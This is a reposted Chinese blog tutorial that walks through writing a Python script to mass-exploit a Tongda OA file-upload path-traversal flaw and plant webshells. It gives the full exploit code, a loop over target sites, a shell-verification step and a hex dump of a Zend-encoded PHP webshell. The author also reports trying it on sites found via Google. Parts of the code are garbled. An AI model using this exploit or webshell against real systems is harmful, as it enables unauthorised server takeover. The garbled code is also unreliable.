python open 函数漏洞_Python系列之——编写已知漏洞exp实现批量getshell

最新推荐文章于 2021-03-11 19:11:43 发布
最新推荐文章于 2021-03-11 19:11:43 发布
阅读量498 收藏
点赞数
文章标签: python open 函数漏洞

0x00 前言

大家应该都觉得用程序实现自动化漏洞利用很爽吧

今天就来教一下大家怎么通过已知的漏洞编写exp

0x01 漏洞分析

以通达OA前台getshell为例(漏洞来自90sec论坛)

论坛给出的exp讲人话就是 post一个文件、”type=addfile”和”other=}/../../../../{22″到”pda/apps/report/getdata.php”

变成代码就是

uploadFile = {'ATTACHMENT':open('shell.php','rb')} #需要zend加密后的php文件

uploadData = {'type':'addfile','other':'}/../../../../{22'}

0x02 exp编写

接着就发送请求且判断shell是否被安全狗等waf杀掉

try:

res = requests.post(website + '/pda/apps/report/getdata.php',files=uploadFile,data=uploadData)

testData = {'nq':"echo 'You got a shell!';"} #利用一句话里面的eval函数输出一段话用于判断shell可用性

r = requests.post(shellPath,data=testData)

if r.status_code == 200 and 'You got a shell!' in r.text:

print shellPath

opt2File(shellPath)

加上各种条件判断和异常处理后

def runGetshellExp(website):

uploadFile = {'ATTACHMENT':open('shell.php','rb')}

uploadData = {'type':'addfile','other':'}/../../../../{22'}

try:

r = requests.get(website)

except:

print 'Can\'t visit' + website

return

try:

res = requests.post(website + '/pda/apps/report/getdata.php',files=uploadFile,data=uploadData)

uploadResp = json.loads(res.text)

if uploadResp[0]['src'] is not None and uploadResp[0]['res'] == 'true':

shellPath = website + '/{22}_shell.php'

testData = {'nq':"echo 'You got a shell!';"}

r = requests.post(shellPath,data=testData)

print r.text

if r.status_code == 200 and 'You got a shell!' in r.text:

print shellPath

opt2File(shellPath)

except:

print website + ' Can\'t getshell'

return

然后写入文件的函数= =(又写这个函数了)

def opt2File(shellPath):

try:

f = open('result.txt','a')

f.write(shellPath + '\n')

finally:

f.close()

完整代码

#coding:utf-8

import requests

import json

def opt2File(shellPath):

try:

f = open('result.txt','a')

f.write(shellPath + '\n') finally: f.close()

finally:

f.close()

def runGetshellExp(website):

uploadFile = {'ATTACHMENT':open('shell.php','rb')}

uploadData = {'type':'addfile','other':'}/../../../../{22'}

try:

r = requests.get(website)

except:

print 'Can\'t visit' + website

return

try:

res = requests.post(website + '/pda/apps/report/getdata.php',files=uploadFile,data=uploadData)

uploadResp = json.loads(res.text)

if uploadResp[0]['src'] is not None and uploadResp[0]['res'] == 'true':

shellPath = website + '/{22}_shell.php'

testData = {'nq':"echo 'You got a shell!';"}

r = requests.post(shellPath,data=testData)

print r.text

if r.status_code == 200 and 'You got a shell!' in r.text:

print shellPath

opt2File(shellPath)

ept:

print website + ' Can\'t getshell'

return

websiteList = [

'http://localhost:8080/', #站点列表

]

for i in websiteList:

runGetshellExp(i)

0x03 小试牛刀

本地搭建了个demo试了一下

又去Google了一些站点来试试脚本

搜索引擎关键字我就不公布了 大家自己找吧

要是关键字找得好一点的话估计是可以拿一大波shell的

但请各位知友们还是点到为止 不要浪哟

0x04 附录

Zend加密后的shell.php(与脚本放同个目录下 密码:nq)

3c3f 7068 7020 405a 656e 643b 0a33 3037

343b 0a2f 2a20 0001 f121 5468 6973 2069

7320 6e6f 7420 6120 7465 7874 2066 696c

6521 deed 0020 202a 2f0a 7072 696e 7420

3c3c 3c45 4f4d 0a3c 2144 4f43 5459 5045

2048 544d 4c20 5055 424c 4943 2022 2d2f

2f57 3343 2f2f 4454 4420 4854 4d4c 2034

2e30 2054 7261 6e73 6974 696f 6e61 6c2f

2f45 4e22 3e3c 4854 4d4c 3e3c 4845 4144

3e3c 2f48 4541 443e 3c42 4f44 5920 4c41

4e47 3d22 656e 2d55 5322 2044 4952 3d22

4c54 5222 3e3c 4832 2041 4c49 474e 3d43

454e 5445 523e 5a65 6e64 2047 7561 7264

2052 756e 2d74 696d 6520 7375 7070 6f72

7420 6d69 7373 696e 6721 3c2f 4832 3e3c

503e 4f6e 6520 6d6f 7265 206d 6f72 6520

6669 6c65 7320 6f6e 2074 6869 7320 7765

6220 7369 7465 2077 6572 6520 656e 636f

6465 6420 6279 203c 4120 4852 4546 3d22

6874 7470 3a2f 2f77 7777 2e7a 656e 642e

636f 6d2f 7072 6f64 7563 7473 2f67 7561

7264 223e 5a65 6e64 4775 6172 643c 2f41

3e20 616e 6420 7468 6520 7265 7175 6972

6564 2072 756e 2d74 696d 6520 7375 7070

6f72 7420 6973 206e 6f74 2069 6e73 7461

6c6c 6564 206f 7270 726f 7065 726c 7920

636f 6e66 6967 7572 6564 2e3c 2f50 3e3c

4833 3e46 6f72 2074 6865 2057 6562 2073

6974 6520 7573 6572 3c2f 4833 3e3c 503e

5468 6973 206d 6561 6e73 2074 6861 7420

7468 6973 2057 6562 2073 6572 7665 7220

6973 206e 6f74 2063 6f6e 6669 6775 7265

6420 636f 7272 6563 746c 7920 746f 2072

756e 7468 6520 6669 6c65 7320 7468 6174

2069 7420 636f 6e74 6169 6e73 2e20 506c

6561 7365 2063 6f6e 7461 6374 2074 6865

2057 6562 2073 6974 6527 7361 646d 696e

6973 7472 6174 6f72 2f77 6562 6d61 7374

6572 2061 6e64 2069 6e66 6f72 6d20 7468

656d 206f 6620 7468 6973 2070 726f 626c

656d 2061 6e64 2067 6976 6520 7468 656d

7468 6520 5552 4c20 796f 7520 6172 6520

7472 7969 6e67 2074 6f20 6469 7370 6c61

7920 746f 2068 656c 7020 7468 656d 2069

6e20 6469 6167 6e6f 7369 6e67 2074 6865

7072 6f62 6c65 6d2e 3c2f 503e 3c48 333e

466f 7220 5468 6520 5369 7465 2041 646d

696e 6973 7472 6174 6f72 2f57 6562 204d

6173 7465 723c 2f48 333e 3c50 3e4f 6e65

206f 7220 6d6f 7265 2066 696c 6573 206f

6e20 796f 7572 2073 6974 6520 7765 7265

2065 6e63 6f64 6564 2077 6974 6820 5a65

6e64 2047 7561 7264 2e20 5468 6973 6d61

7920 6265 2074 6869 7264 2070 6172 7479

206c 6962 7261 7269 6573 2074 6861 7420

7765 7265 2070 726f 7669 6465 6420 746f

2079 6f75 2062 7920 616e 2049 5356 2e20

546f 616c 6c6f 7720 7468 6573 6520 6669

6c65 7320 746f 2070 726f 7065 726c 7920

7275 6e20 796f 7520 6e65 6564 2074 6f20

646f 776e 6c6f 6164 2061 6e64 2069 6e73

7461 6c6c 6f6e 6520 6f66 2074 6865 205a

656e 6420 6775 6172 6420 7275 6e2d 7469

6d65 206c 6962 7261 7269 6573 2e20 5468

6973 2069 7320 6569 7468 6572 205a 656e

644f 7074 696d 697a 6572 206f 7220 5a65

6e64 204c 6f61 6465 722e 2054 6865 2070

726f 7065 7220 6669 6c65 7320 6361 6e20

6265 2064 6f77 6e6c 6f61 6465 6420 6672

6f6d 3c41 2048 5245 463d 2268 7474 703a

2f2f 7777 772e 7a65 6e64 2e63 6f6d 2f67

7561 7264 2f64 6f77 6e6c 6f61 6473 223e

6874 7470 3a2f 2f77 7777 2e7a 656e 642e

636f 6d2f 6775 6172 642f 646f 776e 6c6f

6164 733c 2f41 3e2e 5468 6973 2073 6f66

7477 6172 6520 6973 2070 726f 7669 6465

6420 6672 6565 206f 6620 6368 6172 6765

2e3c 2f50 3e3c 503e 3c42 3e47 656e 6572

616c 2044 6973 636c 6169 6d65 723a 3c2f

423e 205a 656e 6420 5465 6368 6e6f 6c6f

6769 6573 2069 7320 6e6f 7420 7265 7370

6f6e 7369 626c 6520 746f 7468 6520 636f

6e66 6967 7572 6174 696f 6e20 616e 6420

7365 7475 7020 6f66 2077 6562 2073 6974

6573 2075 7369 6e67 205a 656e 6420 4775

6172 6420 7465 6368 6e6f 6c6f 6779 2e50

6c65 6173 6520 636f 6e74 6163 7420 796f

7572 2073 6f66 7477 6172 6520 7665 6e64

6f72 2069 6620 7468 6573 6520 636f 6d70

6f6e 656e 7473 2077 6572 6520 7072 6f76

6964 6564 6279 2061 6e20 4953 5620 6f72

2063 6f6e 7375 6c74 2079 6f75 7220 5a65

6e64 2047 7561 7264 2055 7365 7273 2047

7569 6465 2069 6620 7468 6573 6520 6669

6c65 7320 7765 7265 656e 636f 6465 6420

6279 2079 6f75 7220 6f72 6761 6e69 7a61

7469 6f6e 2e3c 2f50 3e3c 2f42 4f44 593e

3c2f 4854 4d4c 3e0a 454f 4d3b 0a65 7869

7428 293b 0a5f 5f68 616c 745f 636f 6d70

696c 6572 2829 3b0a 3f3e 0a0a 0b32 3030

3430 3732 3230 3300 0636 3535 3431 0004

3136 3300 0432 3732 0078 f90a 9f32 0c03

15fe 51a9 7929 0aae 79a0 8aa6 0858 9966

26e6 40bc 0651 cc6d 6862 6e6e 686a 686c

6e04 641b 189b 1999 9a59 020b 1470 8320

a534 37b7 522f 3125 a508 5aaf 3370 191a

9b18 199a 9b1b 814b 4290 5590 961e 38c7

3042 430a 9ab4 2fb0 4003 10e2 3cb0 98b2

0ad0 992c d0d4 c300 7188 2c07 588d 11b2

5ea8 4f8c 19d8 a091 131f e01f 1c02 f212

a444 05e2 bc42 3017 961c 419c ff0c f0a0

8406 a8ae 210a 1f00 d564 21d7

本文转载经作者本人授权,未经授权禁止转载!

weixin_39983383
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP swoole解密,[讨论]php7.3如何解密swoole
weixin_39611070的博客
03-21 2695
代码如下,感觉某种swoole编码不知如何解5357 4f4f 4c45 4300 3c3f 7068 7020 65787465 6e73 696f 6e5f 6c6f 6164 6564 28277377 6f6f 6c65 5f6c 6f61 6465 7227 29206f72 2064 6965 2827 204c 6f61 6465 72206578 7420 6e6f 7420 69...
python 一键获取shell v3.0
DAo_1990的博客
11-17 1406
前一篇中,没有生成html报告,同时不能#coding=utf-8import requestsimport Queue import threading import re import ConfigParser import sys from output import * queue=Queue.Queue() writeQueue=Queue.Queue() INFORMATION=dic
Python大黑阔—url采集+exp验证,带你批量测试
dfdhxb995397的博客
06-06 4068
i春秋作家:大木瓜 前言: 最近几天在整理从各处收集来的各种工具包,大大小小的塞满了十几个G的硬盘,无意间发现了一个好几年前的0day。心血来潮就拿去试了一下,没想到真的还可以用,不过那些站点都已经老的不像样了,个个年久失修,手工测了几个发现,利用率还挺可观,于是就想配合url采集器写一个批量exp的脚本。于是就有了今天这一文。结尾附上一枚表哥论坛的邀请码一不小心买多了。先到先得哦。...
通达OA远程命令执行漏洞利用复现(exp,getshell)
Beret-81的博客
07-07 4738
通达OA远程命令执行漏洞利用复现一、漏洞描述二、环境搭建三、影响版本四、漏洞复现五、工具使用 一、漏洞描述 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 二、环境搭建 1、通达OA下载后,一键安装 下载地址:http://www.tongda2000.com/download/down.php
python3编写ThinkPHP命令执行Getshell的方法
12-25
加了三个验证漏洞以及四个getshell方法 # /usr/bin/env python3 # -*- coding: utf-8 -*- # @Author: Morker # @Email: [email]admin@nsf.me[/email] # @Blog: [url]http://nsf.me/[/url] import requests import sys def demo(): print(' _______ _ _ _ _____ _ _ _____ ') print(' |__ __| | (_) | | | __ \| | | | _
Python内置函数——__import__ 的使用方法
12-25
__import__() 函数用于动态加载类和函数 。 如果一个模块经常变化就可以使用 __import__() 来动态载入。 语法 __import__ 语法: __import__(name[, globals[, locals[, fromlist[, level]]]]) 参数说明: name...
yuyinxinchuli.rar_python_python 语音_python函数_yuyinxinchuli_信号 pyt
07-14
Python编写的语音信号处理函数,可以运行
Python网络安全项目开发实战_利用Python监测漏洞_编程案例解析实例详解课程教程.pdf
04-27
任何软件和系统都没法保证百分之百的安全。但当某个软件发现了漏洞,它就会影响众多的使用者。对于这种情况,我们只能常看相关的论坛,积极地打补丁修补,没有什么更好的办法应对。网络上公布的漏洞很多,只要发布新...
python_for_kalman_python实现批量命名文件_
10-01
"python_for_kalman_python实现批量命名文件_"这个标题暗示了我们将会探讨如何使用Python批量重命名文件,这是一个非常实用的技能,特别是在处理大量数据或者文件整理时。下面,我们将深入学习如何使用Python来...
lazy_binomial_heap的python实现——lazy 二项堆——优先队列。
06-22
lazy binomial heaps的oython实现,优先队列。采用双向循环链表实现,api:merge,insert,find_min,extractMin,coalesce_step,updateMin。
cve-2018-2628 exp getshell
05-21
cve-2018-2628 exp getshell
python open 函数漏洞_input()函数中的Python漏洞
weixin_28943045的博客
03-01 210
在本文中,我们将学习在版本2.x中输入函数如何以不良方式运行。或更早。在2.x版中。raw_input()函数可替换该input()函数。在较新的版本3.x中。或稍后,将两个功能的所有所需特征和功能合并到该input()方法中。首先,让我们看一下在Python 2.x中接受输入的内置函数的输入类型。示例#InputGiven:Stringstr1=raw_input("Outputo...
初学python,使用open函数的路径一些坑
热门推荐
记录在这里的博客
01-04 2万+
做一个小练习:敏感词文本文件 filtered_words.txt,里面的内容为以下内容,当用户输入敏感词语时,则打印出 Freedom,否则打印出 Human Rights。 北京 程序员 公务员 (1)路径问题 open一个同py文件同一个目录的文件的时候,用以下: txt = open('/filtered_words.txt','rb') words = txt.readl
Python open() 函数
jingbaomm的专栏
11-04 926
open(name[, mode[, buffering]]) 参数说明: name : 一个包含了你要访问的文件名称的字符串值。 mode : mode 决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。 buffering : 如果 buffering 的值被设为 0,就不会有寄存。如果 bu...
php批量getshell,任意文件上传引发的批量Getshell到服务器 - WileySec's Blog
weixin_36003864的博客
03-11 612
昨天闲来没事干,看了看娱乐网,看到有人发布了表白墙源码,本着这肯定有漏洞的心去测了一下,果然有漏洞存在任意文件上传直接Getshell,而后写了一个一键Getshell脚本批量。Feature漏洞位置在 Index 控制器下的 Index.php 中有个 upload 方法,存在任意文件上传代码审计部分就不详细说明了漏洞利用EXP编写import requestsimport urllib3imp...
python学习之exp整合
cxk
06-10 965
python学习之exp整合 将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能 使用方法 python demo.py "url" # -*- coding:utf-8 -*- import urllib import urllib.request import requests import os import hashlib #import test.py import ...
编写poc和exploit的几款常用工具介绍
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
weixin_29863401的博客
03-11 539
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧谷歌批量还需改进 一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com...
python函数调用位置_Python基础手册23——函数的调用
最新发布
06-09
Python 中,函数的调用是通过函数名和括号来实现的,括号中可以包含函数的参数(如果有的话)。例如,要调用名为 `my_function` 的函数,可以使用以下代码: ```python my_function() ``` 如果 `my_function` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值